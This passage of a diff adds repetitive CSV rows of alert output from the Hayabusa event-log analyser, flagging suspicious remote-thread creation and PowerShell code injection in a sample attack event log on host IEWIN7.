+2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
